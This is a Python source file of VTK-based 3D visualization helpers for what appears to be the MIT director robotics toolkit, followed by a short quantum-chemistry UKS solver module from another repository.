attributes=om.PropertyAttributes(enumNames=['Surface', 'Wireframe', 'Surface with edges', 'Points'], hidden=True)) self.addProperty('Color', [1.0, 1.0, 1.0]) self.addProperty('Show Scalar Bar', False) self._updateSurfaceProperty() self._updateColorByProperty() if view is not None: self.addToView(view) def _renderAllViews(self): for view in self.views: view.render() def hasDataSet(self, dataSet): return dataSet == self.polyData def setPolyData(self, polyData): self.polyData = polyData self.mapper.SetInput(polyData) self._updateSurfaceProperty() self._updateColorByProperty() self._updateColorBy(retainColorMap=True) if self.getProperty('Visible'): self._renderAllViews() def getArrayNames(self): pointData = self.polyData.GetPointData() return [pointData.GetArrayName(i) for i in xrange(pointData.GetNumberOfArrays())] def setSolidColor(self, color): self.setProperty('Color', [float(c) for c in color]) self.colorBy(None) def _isPointCloud(self): return self.polyData.GetNumberOfPoints() and (self.polyData.GetNumberOfCells() == self.polyData.GetNumberOfVerts()) def colorBy(self, arrayName, scalarRange=None, lut=None): if not arrayName: self.mapper.ScalarVisibilityOff() self.polyData.GetPointData().SetActiveScalars(None) return array = self.polyData.GetPointData().GetArray(arrayName) if not array: print 'colorBy(%s): array not found' % arrayName self.mapper.ScalarVisibilityOff() self.polyData.GetPointData().SetActiveScalars(None) return self.polyData.GetPointData().SetActiveScalars(arrayName) if not lut: lut = self._getDefaultColorMap(array, scalarRange) #self.mapper.SetColorModeToMapScalars() self.mapper.ScalarVisibilityOn() self.mapper.SetUseLookupTableScalarRange(True) self.mapper.SetLookupTable(lut) self.mapper.SetInterpolateScalarsBeforeMapping(not self._isPointCloud()) if self.getProperty('Visible'): self._renderAllViews() def getChildFrame(self): frameName = self.getProperty('Name') + ' frame' return self.findChild(frameName) def addToView(self, view): if view in self.views: return self.views.append(view) view.renderer().AddActor(self.actor) if 
self.shadowActor: view.renderer().AddActor(self.shadowActor) view.render() def _onPropertyChanged(self, propertySet, propertyName): om.ObjectModelItem._onPropertyChanged(self, propertySet, propertyName) if propertyName == 'Point Size': self.actor.GetProperty().SetPointSize(self.getProperty(propertyName)) elif propertyName == 'Alpha': self.actor.GetProperty().SetOpacity(self.getProperty(propertyName)) if self.shadowActor: self.shadowActor.GetProperty().SetOpacity(self.getProperty(propertyName)) elif propertyName == 'Visible': self.actor.SetVisibility(self.getProperty(propertyName)) if self.shadowActor: self.shadowActor.SetVisibility(self.getProperty(propertyName)) elif propertyName == 'Surface Mode': mode = self.properties.getPropertyEnumValue(propertyName) prop = self.actor.GetProperty() if mode == 'Surface': prop.SetRepresentationToSurface() prop.EdgeVisibilityOff() if mode == 'Wireframe': prop.SetRepresentationToWireframe() elif mode == 'Surface with edges': prop.SetRepresentationToSurface() prop.EdgeVisibilityOn() elif mode == 'Points': prop.SetRepresentationToPoints() elif propertyName == 'Color': color = self.getProperty(propertyName) self.actor.GetProperty().SetColor(color) elif propertyName == 'Color By': self._updateColorBy() elif propertyName == 'Show Scalar Bar': self._updateScalarBar() self._renderAllViews() def setScalarRange(self, rangeMin, rangeMax): arrayName = self.getPropertyEnumValue('Color By') if arrayName != 'Solid Color': lut = self.mapper.GetLookupTable() self.colorBy(arrayName, scalarRange=(rangeMin, rangeMax)) def _updateSurfaceProperty(self): enableSurfaceMode = self.polyData.GetNumberOfPolys() or self.polyData.GetNumberOfStrips() self.properties.setPropertyAttribute('Surface Mode', 'hidden', not enableSurfaceMode) def _updateColorBy(self, retainColorMap=False): arrayName = self.getPropertyEnumValue('Color By') if arrayName == 'Solid Color': self.colorBy(None) else: lut = self.mapper.GetLookupTable() if retainColorMap else None self.colorBy(arrayName, lut=lut) self._updateScalarBar() def _updateColorByProperty(self): enumNames = ['Solid Color'] + self.getArrayNames() currentValue = self.properties.getProperty('Color By') if currentValue >= len(enumNames): self.setProperty('Color By', 0) self.properties.setPropertyAttribute('Color By', 'enumNames', enumNames) def _updateScalarBar(self): barEnabled = self.getProperty('Show Scalar Bar') colorBy = self.getProperty('Color By') if barEnabled and colorBy != 0: self._showScalarBar() else: self._hideScalarBar() def _hideScalarBar(self): if self.scalarBarWidget: self.scalarBarWidget.Off() self.scalarBarWidget.SetInteractor(None) self.scalarBarWidget = None self._renderAllViews() def _showScalarBar(self): title = self.properties.getPropertyEnumValue('Color By') view = self.views[0] lut = self.mapper.GetLookupTable() self.scalarBarWidget = createScalarBarWidget(view, lut, title) self._renderAllViews() def _setScalarBarTextColor(self, color=(0,0,0)): act = self.scalarBarWidget.GetScalarBarActor() act.GetTitleTextProperty().SetColor(color) act.GetLabelTextProperty().SetColor(color) def _setScalarBarTitle(self, titleText): act = self.scalarBarWidget.GetScalarBarActor() act.SetTitle(titleText) def getCoolToWarmColorMap(self, scalarRange): f = vtk.vtkDiscretizableColorTransferFunction() f.DiscretizeOn() f.SetColorSpaceToDiverging() f.SetNumberOfValues(256) f.AddRGBPoint(scalarRange[0], 0.23, 0.299, 0.754) f.AddRGBPoint(scalarRange[1], 0.706, 0.016, 0.15) f.Build() return f def _getDefaultColorMap(self, array, scalarRange=None, 
hueRange=None): name = array.GetName() blueToRed = (0.667, 0) redtoBlue = (0, 0.667) hueMap = { 'Axes' : redtoBlue } scalarRange = scalarRange or self.rangeMap.get(name, array.GetRange()) hueRange = hueRange or hueMap.get(name, blueToRed) lut = vtk.vtkLookupTable() lut.SetNumberOfColors(256) lut.SetHueRange(hueRange) lut.SetRange(scalarRange) lut.Build() return lut #return self.getCoolToWarmColorMap(scalarRange) def shadowOn(self): if self.shadowActor: return mat = [[1, 0, -1, 0], [0, 1, -1, 0], [0, 0, 0, 0], [0, 0, 0, 1]] shadowT = transformUtils.getTransformFromNumpy(mat) baseTransform = self.actor.GetUserTransform() if baseTransform: shadowT.PreMultiply() shadowT.Concatenate(baseTransform) self.shadowActor = vtk.vtkActor() self.shadowActor.SetMapper(self.mapper) self.shadowActor.SetUserTransform(shadowT) self.shadowActor.GetProperty().LightingOff() self.shadowActor.GetProperty().SetColor(0, 0, 0) for view in self.views: view.renderer().AddActor(self.shadowActor) def shadowOff(self): for view in self.views: view.renderer().RemoveActor(self.shadowActor) self.shadowActor = None def onRemoveFromObjectModel(self): om.ObjectModelItem.onRemoveFromObjectModel(self) self.removeFromAllViews() def removeFromAllViews(self): for view in list(self.views): self.removeFromView(view) assert len(self.views) == 0 self._hideScalarBar() def removeFromView(self, view): assert view in self.views self.views.remove(view) view.renderer().RemoveActor(self.actor) if self.shadowActor: view.renderer().RemoveActor(self.shadowActor) for renderer in self.extraViewRenderers.get(view, []): renderer.RemoveActor(self.actor) view.render() class TextItem(om.ObjectModelItem): def __init__(self, name, text='', view=None): om.ObjectModelItem.__init__(self, name) self.views = [] self.actor = vtk.vtkTextActor() prop = self.actor.GetTextProperty() prop.SetFontSize(18) self.actor.SetPosition(10,10) self.actor.SetInput(text) self.addProperty('Visible', True) self.addProperty('Text', text) self.addProperty('Position', [10, 10], attributes=om.PropertyAttributes(minimum=0, maximum=3000, singleStep=1)) self.addProperty('Font Size', 18, attributes=om.PropertyAttributes(minimum=6, maximum=128, singleStep=1)) self.addProperty('Bold', False) self.addProperty('Italic', False) if view: self.addToView(view) def addToView(self, view): if view in self.views: return self.views.append(view) view.renderer().AddActor(self.actor) view.render() def _renderAllViews(self): for view in self.views: view.render() def onRemoveFromObjectModel(self): om.ObjectModelItem.onRemoveFromObjectModel(self) self.removeFromAllViews() def removeFromAllViews(self): for view in list(self.views): self.removeFromView(view) def removeFromView(self, view): assert view in self.views self.views.remove(view) view.renderer().RemoveActor(self.actor) view.render() def _onPropertyChanged(self, propertySet, propertyName): om.ObjectModelItem._onPropertyChanged(self, propertySet, propertyName) if propertyName == 'Visible': self.actor.SetVisibility(self.getProperty(propertyName)) self._renderAllViews() elif propertyName == 'Text': view = app.getCurrentRenderView() self.actor.SetInput(self.getProperty(propertyName)) elif propertyName == 'Position': pos = self.getProperty(propertyName) self.actor.SetPosition(pos[0], pos[1]) elif propertyName == 'Font Size': self.actor.GetTextProperty().SetFontSize(self.getProperty(propertyName)) elif propertyName == 'Bold Size': self.actor.GetTextProperty().SetBold(self.getProperty(propertyName)) elif propertyName == 'Italic': 
self.actor.GetTextProperty().SetItalic(self.getProperty(propertyName)) if self.getProperty('Visible'): self._renderAllViews() def updateText(text, name, **kwargs): obj = om.findObjectByName(name) obj = obj or showText(text, name, **kwargs) obj.setProperty('Text', text) return obj def showText(text, name, fontSize=18, position=(10, 10), parent=None, view=None): view = view or app.getCurrentRenderView() assert view item = TextItem(name, text, view=view) item.setProperty('Font Size', fontSize) item.setProperty('Position', list(position)) if isinstance(parent, str): parentObj = om.getOrCreateContainer(parent) else: parentObj = parent om.addToObjectModel(item, parentObj) return item class FrameItem(PolyDataItem): def __init__(self, name, transform, view): PolyDataItem.__init__(self, name, vtk.vtkPolyData(), view) self.transform = transform self._blockSignals = False self.actor.SetUserTransform(transform) self.widget = vtk.vtkFrameWidget() self.widget.CreateDefaultRepresentation() self.widget.EnabledOff() self.rep = self.widget.GetRepresentation() self.rep.SetTransform(transform) self.traceData = None self._frameSync = None self.addProperty('Scale', 1.0, attributes=om.PropertyAttributes(decimals=2, minimum=0.01, maximum=100, singleStep=0.1, hidden=False)) self.addProperty('Edit', False) self.addProperty('Trace', False) self.addProperty('Tube', False) self.properties.setPropertyIndex('Edit', 0) self.properties.setPropertyIndex('Trace', 1) self.properties.setPropertyIndex('Tube', 2) self.callbacks.addSignal('FrameModified') self.onTransformModifiedCallback = None self.observerTag = self.transform.AddObserver('ModifiedEvent', self.onTransformModified) self._updateAxesGeometry() self.setProperty('Color By', 'Axes') self.setProperty('Icon', om.Icons.Axes) def connectFrameModified(self, func): return self.callbacks.connect('FrameModified', func) def disconnectFrameModified(self, callbackId): self.callbacks.disconnect(callbackId) def onTransformModified(self, transform, event): if not self._blockSignals: if self.onTransformModifiedCallback: self.onTransformModifiedCallback(self) self.callbacks.process('FrameModified', self) def _createAxes(self, scale, useTube): axes = vtk.vtkAxes() axes.SetComputeNormals(0) axes.SetScaleFactor(scale) axes.Update() if useTube: tube = vtk.vtkTubeFilter() tube.SetInput(axes.GetOutput()) tube.SetRadius(0.002) tube.SetNumberOfSides(12) tube.Update() axes = tube return shallowCopy(axes.GetOutput()) def addToView(self, view): PolyDataItem.addToView(self, view) def copyFrame(self, transform): self._blockSignals = True self.transform.SetMatrix(transform.GetMatrix()) self._blockSignals = False self.transform.Modified() parent = self.parent() if (parent and parent.getProperty('Visible')) or self.getProperty('Visible'): self._renderAllViews() def getFrameSync(self): if self._frameSync is None: self._frameSync = FrameSync() self._frameSync.addFrame(self) return self._frameSync def _updateAxesGeometry(self): scale = self.getProperty('Scale') self.rep.SetWorldSize(scale) self.setPolyData(self._createAxes(scale, self.getProperty('Tube'))) def _onPropertyChanged(self, propertySet, propertyName): PolyDataItem._onPropertyChanged(self, propertySet, propertyName) if propertyName == 'Scale': scale = self.getProperty(propertyName) self.rep.SetWorldSize(scale) self._updateAxesGeometry() elif propertyName == 'Edit': view = app.getCurrentRenderView() if view not in self.views: view = self.views[0] self.widget.SetInteractor(view.renderWindow().GetInteractor()) 
self.widget.SetEnabled(self.getProperty(propertyName)) isEditing = self.getProperty(propertyName) if isEditing: frameupdater.registerFrame(self) elif propertyName == 'Trace': trace = self.getProperty(propertyName) if trace and not self.traceData: self.traceData = FrameTraceVisualizer(self) elif not trace and self.traceData: om.removeFromObjectModel(self.traceData.getTraceData()) self.traceData = None elif propertyName == 'Tube': self._updateAxesGeometry() def onRemoveFromObjectModel(self): PolyDataItem.onRemoveFromObjectModel(self) self.transform.RemoveObserver(self.observerTag) self.widget.SetInteractor(None) self.widget.EnabledOff() for view in self.views: view.renderer().RemoveActor(self.actor) view.render() class FrameTraceVisualizer(object): def __init__(self, frame): self.frame = frame self.traceName = '%s trace' % frame.getProperty('Name') self.lastPosition = np.array(frame.transform.GetPosition()) self.lineCell = vtk.vtkLine() frame.connectFrameModified(self.onFrameModified) def getTraceData(self): t = self.frame.findChild(self.traceName) if not t: pts = vtk.vtkPoints() pts.SetDataTypeToDouble() pts.InsertNextPoint(self.frame.transform.GetPosition()) pd = vtk.vtkPolyData() pd.SetPoints(pts) pd.SetLines(vtk.vtkCellArray()) t = showPolyData(pd, self.traceName, parent=self.frame) return t def addPoint(self, point): traceData = self.getTraceData() pd = traceData.polyData pd.GetPoints().InsertNextPoint(point) numberOfPoints = pd.GetNumberOfPoints() line = self.lineCell ids = line.GetPointIds() ids.SetId(0, numberOfPoints-2) ids.SetId(1, numberOfPoints-1) pd.GetLines().InsertNextCell(line.GetPointIds()) pd.Modified() traceData._renderAllViews() def onFrameModified(self, frame): position = np.array(frame.transform.GetPosition()) if not np.allclose(position, self.lastPosition): self.addPoint(position) class FrameSync(object): class FrameData(object): def __init__(self, **kwargs): self.__dict__.update(kwargs) def __init__(self): self.frames = {} self._blockCallbacks = False self._ids = itertools.count() def addFrame(self, frame, ignoreIncoming=False): if frame is None: return if self._findFrameId(frame) is not None: return frameId = self._ids.next() callbackId = frame.connectFrameModified(self._onFrameModified) self.frames[frameId] = FrameSync.FrameData( ref=weakref.ref(frame), baseTransform=self._computeBaseTransform(frame), callbackId=callbackId, ignoreIncoming=ignoreIncoming) def removeFrame(self, frame): frameId = self._findFrameId(frame) if frameId is None: raise KeyError(frame) frame.disconnectFrameModified(self.frames[frameId].callbackId) self._removeFrameId(frameId) def _computeBaseTransform(self, frame): currentDelta = None for frameId, frameData in self.frames.items(): if frameData.ref() is None: self._removeFrameId(frameId) elif frameData.ref() is frame: continue else: currentDelta = transformUtils.copyFrame(frameData.baseTransform.GetLinearInverse()) currentDelta.Concatenate(transformUtils.copyFrame(frameData.ref().transform)) break t = transformUtils.copyFrame(frame.transform) t.PostMultiply() if currentDelta: t.Concatenate(currentDelta.GetLinearInverse()) return t def _removeFrameId(self, frameId): del self.frames[frameId] def _findFrameId(self, frame): for frameId, frameData in self.frames.items(): if frameData.ref() is None: self._removeFrameId(frameId) elif frameData.ref() is frame: return frameId def _moveFrame(self, frameId, modifiedFrameId): frameData = self.frames[frameId] modifiedFrameData = self.frames[modifiedFrameId] t = vtk.vtkTransform() t.PostMultiply() 
t.Concatenate(frameData.baseTransform) t.Concatenate(modifiedFrameData.baseTransform.GetLinearInverse()) t.Concatenate(modifiedFrameData.ref().transform) frameData.ref().copyFrame(t) def _onFrameModified(self, frame): if self._blockCallbacks: return modifiedFrameId = self._findFrameId(frame) assert modifiedFrameId is not None #print self, 'onFrameModified:', self.frames[modifiedFrameId].ref().getProperty('Name') if self.frames[modifiedFrameId].ignoreIncoming: self.frames[modifiedFrameId].baseTransform = self._computeBaseTransform(frame) return self._blockCallbacks = True for frameId, frameData in self.frames.items(): if frameData.ref() is None: self._removeFrameId(frameId) elif frameId != modifiedFrameId: #print ' ', self, 'moving:', self.frames[frameId].ref().getProperty('Name') self._moveFrame(frameId, modifiedFrameId) self._blockCallbacks = False class ViewOptionsItem(om.ObjectModelItem): def __init__(self, view): om.ObjectModelItem.__init__(self, 'view options') self.view = view self.addProperty('Camera projection', 0, attributes=om.PropertyAttributes(enumNames=['Perspective', 'Parallel'])) self.addProperty('View angle', view.camera().GetViewAngle(), attributes=om.PropertyAttributes(minimum=2, maximum=180)) self.addProperty('Key light intensity', view.lightKit().GetKeyLightIntensity(), attributes=om.PropertyAttributes(minimum=0, maximum=5, singleStep=0.1, decimals=2)) self.addProperty('Light kit', True) self.addProperty('Eye dome lighting', False) self.addProperty('Orientation widget', True) self.addProperty('Interactive render', True) self.addProperty('Gradient background', True) self.addProperty('Background color', view.backgroundRenderer().GetBackground()) self.addProperty('Background color 2', view.backgroundRenderer().GetBackground2()) def _onPropertyChanged(self, propertySet, propertyName): om.ObjectModelItem._onPropertyChanged(self, propertySet, propertyName) if propertyName in ('Gradient background', 'Background color', 'Background color 2'): colors = [self.getProperty('Background color'), self.getProperty('Background color 2')] if not self.getProperty('Gradient background'): colors[1] = colors[0] self.view.renderer().SetBackground(colors[0]) self.view.renderer().SetBackground2(colors[1]) elif propertyName == 'Camera projection': if self.getPropertyEnumValue(propertyName) == 'Perspective': self.view.camera().ParallelProjectionOff() else: self.view.camera().ParallelProjectionOn() elif propertyName == 'Orientation widget': if self.getProperty(propertyName): self.view.orientationMarkerWidget().On() else: self.view.orientationMarkerWidget().Off() elif propertyName == 'View angle': angle = self.getProperty(propertyName) self.view.camera().SetViewAngle(angle) elif propertyName == 'Key light intensity': intensity = self.getProperty(propertyName) self.view.lightKit().SetKeyLightIntensity(intensity) elif propertyName == 'Light kit': self.view.setLightKitEnabled(self.getProperty(propertyName)) elif propertyName == 'Eye dome lighting': if self.getProperty(propertyName): enableEyeDomeLighting(self.view) else: disableEyeDomeLighting(self.view) elif propertyName == 'Interactive render': if self.getProperty(propertyName): self.view.renderWindow().GetInteractor().EnableRenderOn() else: self.view.renderWindow().GetInteractor().EnableRenderOff() self.view.render() def showGrid(view, cellSize=0.5, numberOfCells=25, name='grid', parent='sensors', color=[1,1,1], alpha=0.05, gridTransform=None): grid = vtk.vtkGridSource() grid.SetScale(cellSize) grid.SetGridSize(numberOfCells) 
grid.SetSurfaceEnabled(True) grid.Update() gridObj = showPolyData(grid.GetOutput(), 'grid', view=view, alpha=alpha, color=color, visible=True, parent=parent) gridObj.gridSource = grid gridObj.actor.GetProperty().LightingOff() gridObj.actor.SetPickable(False) gridTransform = gridTransform or vtk.vtkTransform() gridObj.actor.SetUserTransform(gridTransform) showFrame(gridTransform, 'grid frame', scale=0.2, visible=False, parent=gridObj, view=view) gridObj.setProperty('Surface Mode', 'Wireframe') def computeViewBoundsNoGrid(): if not gridObj.getProperty('Visible'): return gridObj.actor.SetUseBounds(False) bounds = view.renderer().ComputeVisiblePropBounds() gridObj.actor.SetUseBounds(True) if vtk.vtkMath.AreBoundsInitialized(bounds): view.addCustomBounds(bounds) else: view.addCustomBounds([-1, 1, -1, 1, -1, 1]) view.connect('computeBoundsRequest(ddQVTKWidgetView*)', computeViewBoundsNoGrid) return gridObj def createScalarBarWidget(view, lookupTable, title): w = vtk.vtkScalarBarWidget() bar = w.GetScalarBarActor() bar.SetTitle(title) bar.SetLookupTable(lookupTable) w.SetRepositionable(True) w.SetInteractor(view.renderWindow().GetInteractor()) w.On() rep = w.GetRepresentation() rep.SetOrientation(0) rep.SetPosition(0.77, 0.92) rep.SetPosition2(0.20, 0.07) return w def updatePolyData(polyData, name, **kwargs): obj = om.findObjectByName(name) obj = obj or showPolyData(polyData, name, **kwargs) obj.setPolyData(polyData) return obj def updateFrame(frame, name, **kwargs): obj = om.findObjectByName(name) obj = obj or showFrame(frame, name, **kwargs) obj.copyFrame(frame) return obj def showFrame(frame, name, view=None, parent='segmentation', scale=0.35, visible=True): view = view or app.getCurrentRenderView() assert view if isinstance(parent, str): parentObj = om.getOrCreateContainer(parent) else: parentObj = parent item = FrameItem(name, frame, view) om.addToObjectModel(item, parentObj) item.setProperty('Visible', visible) item.setProperty('Scale', scale) return item def showPolyData(polyData, name, color=None, colorByName=None, colorByRange=None, alpha=1.0, visible=True, view=None, parent='segmentation', cls=None): view = view or app.getCurrentRenderView() assert view cls = cls or PolyDataItem item = cls(name, polyData, view) if isinstance(parent, str): parentObj = om.getOrCreateContainer(parent) else: parentObj = parent om.addToObjectModel(item, parentObj) item.setProperty('Visible', visible) item.setProperty('Alpha', alpha) if colorByName and colorByName not in item.getArrayNames(): print 'showPolyData(colorByName=%s): array not found' % colorByName colorByName = None if colorByName: item.setProperty('Color By', colorByName) item.colorBy(colorByName, colorByRange) else: color = [1.0, 1.0, 1.0] if color is None else color item.setProperty('Color', [float(c) for c in color]) item.colorBy(None) return item def addChildFrame(obj, initialTransform=None): ''' Adds a child frame to the given PolyDataItem. If initialTransform is given, the object's polydata is transformed using the inverse of initialTransform and then a child frame is assigned to the object to maintain its original position. 
''' if obj.getChildFrame(): return if initialTransform: pd = transformPolyData(obj.polyData, initialTransform.GetLinearInverse()) obj.setPolyData(pd) t = obj.actor.GetUserTransform() if t is None: t = vtk.vtkTransform() t.PostMultiply() frame = showFrame(t, obj.getProperty('Name') + ' frame', parent=obj, scale=0.2, visible=False) obj.actor.SetUserTransform(t) return frame def getRandomColor(): ''' Return a random color as a list of RGB values between 0.0 and 1.0. ''' return colorsys.hsv_to_rgb(np.random.rand(), 1.0, 0.9) def showClusterObjects(clusters, parent): colors = [ QtCore.Qt.red, QtCore.Qt.blue, QtCore.Qt.yellow, QtCore.Qt.green, QtCore.Qt.magenta, QtCore.Qt.cyan, QtCore.Qt.darkCyan, QtCore.Qt.darkGreen, QtCore.Qt.darkMagenta ] colors = [QtGui.QColor(c) for c in colors] colors = [(c.red()/255.0, c.green()/255.0, c.blue()/255.0) for c in colors] objects = [] for i, cluster in enumerate(clusters): name = 'object %d' % i color = colors[i % len(colors)] clusterObj = showPolyData(cluster.mesh, name, color=color, parent=parent, alpha=1.0) clusterFrame = showFrame(cluster.frame, name + ' frame', scale=0.2, visible=False, parent=clusterObj) clusterBox = showPolyData(cluster.box, name + ' box', color=color, parent=clusterObj, alpha=0.6, visible=False) clusterPoints = showPolyData(cluster.points, name + ' points', color=color, parent=clusterObj, visible=False, alpha=1.0) if hasattr(cluster,'oriented_frame'): orientedFrame = showFrame(cluster.oriented_frame, name + ' oriented frame', scale=0.2, visible=False, parent=clusterObj) clusterPoints.setProperty('Point Size', 7) clusterPoints.colorBy(None) clusterObj.data = cluster objects.append(clusterObj) for obj in [clusterObj, clusterBox, clusterPoints]: obj.actor.SetUserTransform(cluster.frame) return objects captionWidget = None def hideCaptionWidget(): global captionWidget if captionWidget is not None: captionWidget.Off() captionWidget.Render() def showCaptionWidget(position, text, view=None): view = view or app.getCurrentRenderView() assert view global captionWidget if not captionWidget: rep = vtk.vtkCaptionRepresentation() rep.SetPosition(0.2, 0.8) w = vtk.vtkCaptionWidget() w.SetInteractor(view.renderWindow().GetInteractor()) w.SetRepresentation(rep) w.On() captionWidget = w rep = captionWidget.GetRepresentation() rep.SetAnchorPosition(position) rep.GetCaptionActor2D().SetCaption(text) a = rep.GetCaptionActor2D() pr = a.GetTextActor().GetTextProperty() pr.SetJustificationToCentered() pr.SetVerticalJustificationToCentered() pr.SetItalic(0) pr.SetBold(0) pr.SetShadow(0) pr.SetFontFamilyToArial() c2 = rep.GetPosition2Coordinate() c2.SetCoordinateSystemToDisplay() c2.SetValue(12*len(text),30) # disable border #rep.SetShowBorder(0) a.SetThreeDimensionalLeader(0) a.SetLeaderGlyphSize(0.005) captionWidget.On() captionWidget.Render() def getRayFromDisplayPoint(view, displayPoint): ''' Given a view and an XY display point, returns two XYZ world points which are the display point at the near/far clipping planes of the view. 
''' worldPt1 = [0,0,0,0] worldPt2 = [0,0,0,0] renderer = view.renderer() vtk.vtkInteractorObserver.ComputeDisplayToWorld(renderer, displayPoint[0], displayPoint[1], 0, worldPt1) vtk.vtkInteractorObserver.ComputeDisplayToWorld(renderer, displayPoint[0], displayPoint[1], 1, worldPt2) worldPt1 = np.array(worldPt1[:3]) worldPt2 = np.array(worldPt2[:3]) return worldPt1, worldPt2 def pickImage(displayPoint, view, obj=None): picker = vtk.vtkCellPicker() if isinstance(obj, str): obj = om.findObjectByName(obj) assert obj if obj: picker.AddPickList(obj.actor) picker.PickFromListOn() picker.Pick(displayPoint[0], displayPoint[1], 0, view.renderer()) pickedDataset = picker.GetDataSet() if obj: return picker.GetPointIJK() else: return pickedDataset, picker.GetPointIJK() def pickProp(displayPoint, view): for tolerance in (0.0, 0.005, 0.01): pickType = 'render' if tolerance == 0.0 else 'cells' pickedPoint, pickedProp, pickedDataset = pickPoint(displayPoint, view, pickType=pickType, tolerance=tolerance) if pickedProp is not None: return pickedPoint, pickedProp, pickedDataset return None, None, None def pickPoint(displayPoint, view, obj=None, pickType='points', tolerance=0.01, returnNormal=False): assert pickType in ('points', 'cells', 'render') view = view or app.getCurrentRenderView() assert view if isinstance(obj, str): obj = om.findObjectByName(obj) assert obj if pickType == 'render': picker = vtk.vtkPropPicker() else: picker = vtk.vtkPointPicker() if pickType == 'points' else vtk.vtkCellPicker() picker.SetTolerance(tolerance) if obj is not None: if isinstance(obj, list): for o in obj: picker.AddPickList(o.actor) obj = None else: picker.AddPickList(obj.actor) picker.PickFromListOn() picker.Pick(displayPoint[0], displayPoint[1], 0, view.renderer()) pickedProp = picker.GetViewProp() pickedPoint = np.array(picker.GetPickPosition()) pickedDataset = pickedProp.GetMapper().GetInput() if isinstance(pickedProp, vtk.vtkActor) else None pickedNormal = np.zeros(3) if returnNormal: if pickType == 'cells': pickedNormal = np.array(picker.GetPickNormal()) elif pickType == 'points' and pickedDataset: pointId = picker.GetPointId() normals = pickedDataset.GetPointData().GetNormals() if normals: pickedNormal = np.array(normals.GetTuple3(pointId)) #if pickedDataset and pickType == 'cells': # print 'point id:', pickedDataset.GetCell(picker.GetCellId()).GetPointIds().GetId(picker.GetSubId()) #if pickType == 'points': # print 'point id:', picker.GetPointId() if obj: if returnNormal: return (pickedPoint, pickedNormal) if pickedProp else (None, None) else: return pickedPoint if pickedProp else None else: return (pickedPoint, pickedProp, pickedDataset, pickedNormal) if returnNormal else (pickedPoint, pickedProp, pickedDataset) def mapMousePosition(widget, mouseEvent): mousePosition = mouseEvent.pos() return mousePosition.x(), widget.height - mousePosition.y() def getObjectByDataSet(polyData): for obj in om.getObjects(): if obj.hasDataSet(polyData): return obj def getObjectByProp(prop): if not prop: return None for obj in om.getObjects(): if isinstance(obj, FrameItem) and obj.widget.GetRepresentation() == prop: return obj if isinstance(prop, vtk.vtkActor): return getObjectByDataSet(prop.GetMapper().GetInput()) def findPickedObject(displayPoint, view): pickedPoint, pickedProp, pickedDataset = pickProp(displayPoint, view) obj = getObjectByProp(pickedProp) return obj, pickedPoint def enableEyeDomeLighting(view): seq = vtk.vtkSequencePass() opaque = vtk.vtkOpaquePass() peeling = vtk.vtkDepthPeelingPass() 
peeling.SetMaximumNumberOfPeels(200) peeling.SetOcclusionRatio(0.1) translucent = vtk.vtkTranslucentPass() peeling.SetTranslucentPass(translucent) volume = vtk.vtkVolumetricPass() overlay = vtk.vtkOverlayPass() lights = vtk.vtkLightsPass() passes=vtk.vtkRenderPassCollection() passes.AddItem(lights) passes.AddItem(opaque) #passes.AddItem(peeling) passes.AddItem(translucent) #passes.AddItem(volume) #passes.AddItem(overlay) seq.SetPasses(passes) edlPass = vtk.vtkEDLShading() cameraPass = vtk.vtkCameraPass() edlPass.SetDelegatePass(cameraPass) cameraPass.SetDelegatePass(seq) view.renderer().SetPass(edlPass) def disableEyeDomeLighting(view): view.renderer().SetPass(None) def showImage(filename): ''' Returns a QLabel displaying the image contents of given filename. Make sure to assign the label, it will destruct when it goes out of scope. ''' image = QtGui.QImage(filename) assert not image.isNull() imageLabel = QtGui.QLabel() imageLabel.setPixmap(QtGui.QPixmap.fromImage(image)) imageLabel.setScaledContents(True) imageLabel.resize(imageLabel.pixmap.size()) imageLabel.setWindowTitle(os.path.basename(filename)) imageLabel.show()
mitdrc/director
src/python/director/visualization.py
Python
bsd-3-clause
39,111
[ "VTK" ]
16d101cec27805d7033d112846c8514e6712609a5aad326bb0775a2dfd50fddf
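Editor's note: a minimal sketch of the `showPolyData`/`addChildFrame` helpers defined above; it assumes a running director render view (e.g. inside directorPython), and the sphere source is illustrative.

from director import visualization as vis
from director import vtkAll as vtk

sphere = vtk.vtkSphereSource()
sphere.Update()
obj = vis.showPolyData(sphere.GetOutput(), 'sphere',
                       color=[0.2, 0.6, 1.0], alpha=0.8)

# Attach an editable child frame and turn on the interactive frame widget.
frame = vis.addChildFrame(obj)
frame.setProperty('Edit', True)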
""" UKS via SGM """ import numpy as np from frankenstein.tools.tensor_utils import get_unitary_matrix_ov from pyscf import scf from frankenstein.sgscf import uks, sguhf def update_sghf(mf): pass class SGUKS(uks.UKS): # methods for output print_info = sguhf.print_info # methods for SCF update_sghf = update_sghf get_grad_L = sguhf.get_grad_L update_all = sguhf.update_all # methods for err/conv check check_conv = sguhf.check_conv # methods for GDM get_value_gdm = sguhf.get_value_gdm get_grad_gdm = sguhf.get_grad_gdm get_prec = sguhf.get_prec def __init__(self, pymol): uks.UKS.__init__(self, pymol) self.orb_swap = None self.fd_grad = True # not supported for xc for now self.grad_L = None @property def L(self): grad_E = self.get_grad_E() if self.grad_E is None else self.grad_E return np.sum([grad_E[s].ravel()@grad_E[s].ravel() for s in [0,1]]) @property def err_grad_L(self): grad_L = self.get_grad_L() if self.grad_L is None else self.grad_L return np.sum([np.mean(grad_L[s]**2.) for s in [0,1]])**0.5 if __name__ == "__main__": import sys try: geom = sys.argv[1] basis = sys.argv[2] xc = sys.argv[3] ii = int(sys.argv[4]) aa = int(sys.argv[5]) except: print("Usage: geom, basis, xc, ii, aa") sys.exit(1) from frankenstein.tools.pyscf_utils import get_pymol pymol = get_pymol(geom, basis, verbose=3) from frankenstein.sgscf import rks rmf = rks.RKS(pymol) rmf.xc = xc rmf.kernel() C0 = np.asarray([rmf.mo_coeff.copy(), rmf.mo_coeff.copy()]) mf = SGUKS(pymol) mf.xc = xc mf.orb_swap = [[[mf.no[0]-1-ii,mf.no[0]-1+aa]],[]] mf.kernel(mo_coeff0=C0.copy()) mf.analyze(C0) eex = (mf.e_tot - rmf.e_tot) * 27.211399 print("Eex (%s) = %.3f eV" % (xc, eex)) mu, f = rmf.get_tdm(mf) print("T.D.M. = " + ("{:.4f} "*3).format(*mu)) print("Osc. strg = %.6f" % (f))
hongzhouye/frankenstein
sgscf/sguks.py
Python
bsd-3-clause
2,061
[ "PyMOL", "PySCF" ]
75b433a219b2a3950b0a2d1bffdf900b57911fe6434167478cdc34ecf15f61e4
